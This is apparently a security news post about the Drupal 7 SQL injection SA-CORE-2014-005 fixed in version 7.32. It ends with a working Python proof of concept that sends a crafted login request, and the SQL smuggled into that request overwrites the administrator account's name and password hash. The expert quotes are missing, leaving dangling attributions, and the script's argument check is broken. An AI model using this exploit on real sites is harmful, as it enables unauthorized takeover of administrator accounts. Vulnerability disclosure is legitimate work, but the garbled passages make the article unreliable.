New Drupal SQL Injection On v7.32 Disclosed Publically

New Drupal SQL Injection On v7.32 Disclosed Publically

New Drupal SQL Injection has been discovered and reported to the Drupal security team who have stated that versions of Drupal 7 prior to 7.32 are vulnerable to a “Highly Critical” SQL injection bug. Version 7.32 is now available to address the bug and the Drupal team strongly recommends that Drupal 7 admins update their sites immediately. Drupal is a popular content management system that is free and open source.

An attacker could exploit this vulnerability to achieve privilege escalation or execute arbitrary PHP code. Other unspecified attacks are said to be possible. At the time the vulnerability was disclosed no know exploits were being used. The attack can be launched by an anonymous user, meaning that no social engineering or other work is necessary to allow for it.

Robert Horton, European managing director of security consulting at NCC Group, said that the Drupal flaw is of particular concern because it’s

Horton warned.

Despite its severity the Drupal bug was overlooked for months, Horton added.

Horton said.

Here is a POC of the vulnerability below:

#Drupal 7.x SQL Injection SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005
#Creditz to https://www.reddit.com/user/fyukyuk
import urllib2,sys
from drupalpass import DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py
host = sys.argv[1]
user = sys.argv[2]
password = sys.argv[3]
if len(sys.argv) != 3:
print "host username password"
print "http://nope.io admin wowsecure"
hash = DrupalHash("$S$CTo9G7Lx28rzCfpn4WB2hUlknDKv6QTqHaf82WLbhPT2K5TzKzML", password).get_hash()
target = '%s/?q=node&destination=node' % host
post_data = "name[0%20;update+users+set+name%3d'"
+user
+"'+,+pass+%3d+'"
+hash[:55]
+"'+where+uid+%3d+'1';;#%20%20]=bob&name[0]=larry&pass=lol&form_build_id=&form_id=user_login_block&op=Log+in"
content = urllib2.urlopen(url=target, data=post_data).read()
if "mb_strlen() expects parameter 1" in content:
print "Success!nLogin now with user:%s and pass:%s" % (user, password)

We will be happy to hear your thoughts

Leave a reply

Register New Account
Reset Password